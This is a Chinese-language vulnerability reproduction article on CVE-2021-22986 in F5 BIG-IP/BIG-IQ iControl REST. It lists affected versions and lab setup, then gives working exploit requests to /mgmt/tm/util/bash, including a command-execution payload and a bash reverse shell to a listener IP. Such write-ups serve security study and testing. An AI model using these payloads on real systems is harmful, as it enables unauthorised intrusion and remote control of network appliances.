新西兰服务器

F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析


F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析

发布时间:2021-12-29 17:53:28 来源:高防服务器网 阅读:64 作者:柒染 栏目:安全技术

这期内容当中小编将会给大家带来有关F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00简介

F5 BIG-IP 是美国“F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

0x01漏洞概述

F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。

0x02影响版本

F5 BIG-IP 16.0.0-16.0.1

F5 BIG-IP 15.1.0-15.1.2

F5 BIG-IP 14.1.0-14.1.3.1

F5 BIG-IP 13.1.0-13.1.3.5

F5 BIG-IP 12.1.0-12.1.5.2

F5 BIG-IQ 7.1.0-7.1.0.2

F5 BIG-IQ 7.0.0-7.0.0.1

F5 BIG-IQ 6.0.0-6.1.0

0x03环境搭建

1、 本次漏洞环境使用F5 16.0.0版本进行搭建,F5下载地址:

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.0

2、 注册一个F5账号,访问下载链接,选择相应版本进行下载并同意条款

3、选择VMware格式的下载文件,然后选择下载地区这里选择离得近得下载即可

4、下载完成后,使用VMwear导入安装

VMwear左上角‘文件’->‘打开‘选择下载好的文件

5、选择同意许可,选择安装位置

6、配置方面看自己的选择导入后启动即可系统默认账户:root/default登陆后需要修改默认密码

7、配置完成后打开虚拟机输入初始密码,会提示修改密码 //需要修改强密码

8、修改完成密码后输入config设置IP

9、在浏览器访问此地址需要使用https://your-ip

10、登陆账号为admin登陆密码为之前虚拟机设置得密码,登陆之后需要修改一次密码 需为强密码

0x04漏洞复现

1、首先访问以下url,然后使用Burp进行抓包并发送到Repeater(重放)模块

https://your-ip/mgmt/tm/util/bash

2、修改数据包GET为POST并在添加上X-F5-Auth-Token字段和Authorization

X-F5-Auth-Token字段值为空

Authorization: Basic YWRtaW46QVNhc1M= 后面使用basse64加密了解码出来为admin:ASasS

3、在包内添加以下代码执行命令,查看id,添加完成后发送包

{"command":"run","utilCmdArgs":"-c id"}

4、既然可以执行命令,来反弹shell,使用kali监听

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/172.16.1.127/7765 0>&1'"}

0x05修复方式

1、建议将F5 BIG-IP / BIG-IQ 升级至安全版本。

上述就是小编为大家分享的F5 BIG-IP代码执行漏洞CVE-2021-22986怎么分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注高防服务器网行业资讯频道。

[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[